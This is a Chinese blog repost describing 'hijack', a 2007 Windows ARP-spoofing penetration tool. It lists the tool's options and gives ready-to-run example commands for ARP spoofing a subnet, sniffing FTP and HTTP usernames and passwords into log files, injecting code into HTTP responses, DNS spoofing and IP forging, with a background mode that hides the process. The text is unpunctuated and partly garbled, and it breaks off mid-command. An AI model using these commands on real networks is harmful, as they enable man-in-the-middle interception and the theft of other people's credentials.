滲透工具hijack使用及下載

滲透工具滲透工具 hijackhijack 使用及下載使用及下載 2007 12 14 10 29 57 標簽 工具 使用 hijack 來源 精靈 s blog 找了兩天終于找到這個工具了 郁悶的很 想要的都來下吧 需要 winpcap 支持 07 年的工具 到現(xiàn)在市面上都沒有 可見此工具內(nèi)部人員把握的夠狠 前 幾個月 AK 偶然得到 看了看也沒太用過 今天聽 sink 說網(wǎng)絡(luò)上連個說明都沒有 所以我就發(fā) 出來份吧 Amxking 今天聽某小組成員說此工具是他們開發(fā)的 證實了是 07 年工具 而非 06 年 特此修正 usage hijack h is help usage 顯示幫助信息 V is version information 顯示版本信息 v is be verbose 程序運行時顯示詳細信息 q is be quiet don t print packet reception hash marks 安靜模式 不顯示數(shù)據(jù)包 標識 e is show empty packets 顯示空的數(shù)據(jù)包 o is fixed 0 after replace data offset 替換數(shù)據(jù)后 被替換的數(shù)據(jù)后都用空字節(jié) 0 填充 i is ignore case 忽略大小寫進行匹配 S is spoof interval default is 3000 ms 設(shè)置發(fā)送 RARP 欺騙的時間間隔 不能設(shè)太大 不然程序會死 條件競爭問題 針對攻擊一些反 ARP 欺騙的主機 越小越好 l is set logfile to record 設(shè)置日專記錄文件 日志記錄文件將程序運行輸出的內(nèi)容 再記錄的文件里 r is enabled ip routing 開啟系統(tǒng)內(nèi)置的路由功能 只能嗅探 不能修改數(shù)據(jù)包 b is to force define submask 強制指定子網(wǎng)掩碼 對一些跨網(wǎng)段的欺騙有效 m is define max transmit speed k s 限制最大網(wǎng)絡(luò)傳輸速度 k s f is set full spoof route mode default is half 設(shè)置欺騙方式為雙向欺騙 x is print in alternate hexdump format 打印出來的數(shù)據(jù)為十六進制 X is interpret match e xpression as hexadecimal 設(shè)置要匹配的字串為十六進制 如 0 x0d0a00 p is the port to hijack 設(shè)置要進行數(shù)據(jù)劫持的端口 默認為全部 c is the flag string to insert for http hijack 要插入代碼的 HTTP 響應包的特征字 符串 默認為 200 OK I is read packet stream from pcap format file pcap dump 從一個 pcap 數(shù)據(jù)包格式 的文件里讀取數(shù)據(jù)包 進行離線嗅探 D is dnsspoof mode 模式改變?yōu)?DNS 欺騙 規(guī)則文件格式不變 t is print timestamp every time a packet is matched 當有匹配的數(shù)據(jù)包時 打出時 間戳 E is time to quit 程序自動退出的時間間隔 按秒計算 R is time to reboot program 程序自動重新啟動的時間間隔 按秒計算 N is release demo job file 釋放一規(guī)則文件 s is scan hosts in subnet 掃描子網(wǎng) H is hidden from console background mode killed k 從控制臺隱藏到后到執(zhí)行 可 以用 hijack k 結(jié)束 k is killed a exists instance 結(jié)束一個存在的實例 O is dump matched packets in pcap format to pcap dump 保存匹配的數(shù)據(jù)包到一個 pcap 數(shù)據(jù)包格式的文件里 W is set the dump format normal byline none 設(shè)置數(shù)據(jù)包顯示的格式 一般 按 行 無格式三種 F is read the filter from the specified file 從指定的文件里讀取規(guī)則 z is IP faked mode genuine and faked host variable auto switch full spoof 進 行 IP 偽造 genuine host 和 faked host 生效 自動打開全雙工選項 d is use specified device index 使用指定網(wǎng)卡的索引號 L is show the winpcap device list index 顯示網(wǎng)卡列表 常用功能舉例說明 顯示網(wǎng)卡列表 hijack L 掃描子網(wǎng) hijack sd3 結(jié)束一個現(xiàn)有的實例 hijack k 嗅探功能舉例說明 嗅探子網(wǎng) 程序自動轉(zhuǎn)發(fā) 可以匹配 但不能設(shè)置過濾規(guī)則 hijack d3 192 168 16 192 168 16 1 嗅探子網(wǎng) 同上 雙向欺騙 hijack fd3 192 168 16 192 168 16 1 嗅探子網(wǎng) 同上 退出 Console 進入后臺運行 hijack Hfd3 192 168 16 192 168 16 1 嗅探子網(wǎng) 同上 退出 Console 進入后臺運行 120 秒后程序自動退出 hijack Hfd3 E 120 192 168 16 192 168 16 1 嗅探子網(wǎng) 同上 退出 Console 進入后臺運行 120 秒后程序自動重新運行 hijack Hfd3 R 120 192 168 16 192 168 16 1 嗅探子網(wǎng) 程序自動轉(zhuǎn)發(fā) 發(fā)送 RARP 欺騙包間隔為 100 微秒 hijack d3 S 100 192 168 16 192 168 16 1 嗅探子網(wǎng) 同上 強制指定子網(wǎng)掩碼為 255 255 255 0 hijack d3 S 100 b 255 255 255 0 192 168 16 192 168 16 1 嗅探子網(wǎng) 系統(tǒng)自動轉(zhuǎn)發(fā) 效率高 可以設(shè)置 BPF 規(guī)則 以下為嗅探 FTP 密碼 為條件 分隔符 hijack rqd3 192 168 16 192 168 16 1 USER PASS tcp and dst port 21 同上 將信息保存到 pass log 里 pass log 里有詳細的 FTP 密碼信息 hijack rqd3 l pass log 192 168 16 192 168 16 1 USER PASS tcp and dst port 21 嗅探子網(wǎng) 一些常見的 HTTP 密碼 不區(qū)分大小定 i 選項打開 保存數(shù)據(jù)包到 pass dat 里 hijack rqid3 O pass dat 192 168 16 192 168 16 1 username password tcp and dst port 80 還原數(shù)據(jù)包數(shù)據(jù) 程序?qū)@示嗅探到的數(shù)據(jù)包 hijack I packet dat 自定義要嗅探的主機用 分隔 如 hijack rd3 192 168 16 3 192 168 16 8 192 168 16 10 20 192 168 16 1 數(shù)據(jù)包修改功能舉例說明 釋放一個替則文件 hijack N 釋放的文件如下 gzip gxip http insert hijack 程序以 為分隔符 第一個字符串為原字符串 第二個字符串為替換后的字符串 最 大長度都為 256 字節(jié) 往下再重復 如果是原字符串為 http insert 表始要進行 HTTP 會話劫持 程序?qū)⑾乱粭l字符串插入到 HTTP 響應包里 劫持網(wǎng)關(guān)到子網(wǎng)之間的數(shù)據(jù) 并顯示詳細信息 hijack vd3 p 80 S 100 F job txt 192 168 16 1 192 168 16 修改后的數(shù)據(jù)用 0 字符填充 hijack vod3 p 80 S 100 F job txt 192 168 16 1 192 168 16 修改后的數(shù)據(jù)用 0 字符填充 hijack vod3 p 80 S 100 F job txt c 404 192 168 16 1 192 168 16 DNS 欺騙說明 需打開 D 選項 DNS 欺騙與數(shù)據(jù)包修改唯一不同的就是規(guī)則文件 一個實例的 DNS 欺騙需要用的規(guī)則文件 如下 url http 51CTO 提醒您 請勿濫發(fā)廣告 url 192 168 16 3 192 168 16 1 欺騙后 就把 url http 51CTO 提醒您 請勿濫發(fā)廣告 url 的 IP 解析成了 192 168 16 3 其它所有的都解析為 192 168 16 1 DNS 欺騙 url http 51CTO 提醒您 請勿濫發(fā)廣告 url 為 192 168 16 3 規(guī)則文件 dns txt 如下 51CTO 提醒您 請勿濫發(fā)廣告 192 168 16 3 命令如下 hijack Dvd3 F dns txt 192 168 16 192 168 16 1 注意 實例中 dns 查詢包是從內(nèi)網(wǎng)到外網(wǎng)發(fā)送的 所以欺騙方向要注意 IP 欺騙說明 需打開 z 選項 hijack zd3 202 108 22 33 202 108 22 1 61 163 8